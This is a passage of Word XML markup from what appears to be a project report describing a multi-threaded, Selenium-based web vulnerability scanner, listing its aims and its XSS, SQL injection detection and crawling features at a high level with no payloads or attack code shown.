        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Existing vulnerability scanners often do not allow users to customize inputs, making it difficult to tailor the scans to specific needs and potentially missing critical vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc9987"/>
      <w:bookmarkStart w:id="22" w:name="_Toc32"/>
      <w:bookmarkStart w:id="23" w:name="_Toc20677"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Lack of Speed:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Many existing tools are slow, leading to inefficient scanning processes and delays in identifying vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc19191"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Solutions to these Problems</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="6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development of the new system contains the following activities, which try to solve all the problems in the existing systems:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Enhanced Security with Passive Reconnaissance:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>The scanner provides robust security by employing passive reconnaissance techniques, ensuring thorough vulnerability detection without actively interacting with the target system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Multi-Threaded Environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>The scanner is designed to support a multi-threaded environment, significantly improving the speed and efficiency of the scanning process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Customizable Inputs with Login Information and Payload Files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>Users can customize inputs, including login information and payload files, allowing for more tailored and effective vulnerability scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Automated Browser Interaction with Selenium:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>By using Selenium WebDriver, the scanner automates browser interactions, making it easier to detect vulnerabilities that require user interaction, such as XSS and SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:leftChars="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc43339134"/>
      <w:bookmarkStart w:id="26" w:name="_Toc4965"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Objectives of Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_mvd34hejrpnk" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkStart w:id="28" w:name="_nb3i8wg8yg4t" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Comprehensive Vulnerability Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>High Efficiency and Speed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Customization and Flexibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Automation through Browser Interaction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>User-Friendly and Accessible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Enhanced Security Posture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Scalability and Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Passive Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_ow674bu3dxpf" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkStart w:id="30" w:name="_Toc43339135"/>
      <w:bookmarkStart w:id="31" w:name="_Toc2812"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Features of Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc43339136"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Detection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Scans web applications for XSS vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Uses predefined payloads to test for XSS vulnerabilities in both GET and POST methods.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Handles unexpected alerts and resets the web driver for continuous scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Logs and reports detected XSS vulnerabilities with specific details about the injection point and payload used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection (SQLi) Detection:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Scans web applications for SQL injection vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Utilizes a list of common SQL injection payloads to test input fields and URL parameters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Checks for SQL error messages and HTTP 500 status codes to identify potential SQL injection points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Logs and reports detected SQL injection vulnerabilities with specific details about the injection point and payload used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Automated Web Crawling:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Integrates a web crawler to automatically discover URLs and input fields within the target web application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Ensures comprehensive coverage of the application by identifying all potential injection points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Headless Browser Automation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"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Utilizes Selenium with headless Chrome for automated browser interactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Adds necessary cookies to maintain session state during testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Configures browser options to enhance scanning efficiency and reduce noise in the output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:right="0" w:rightChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
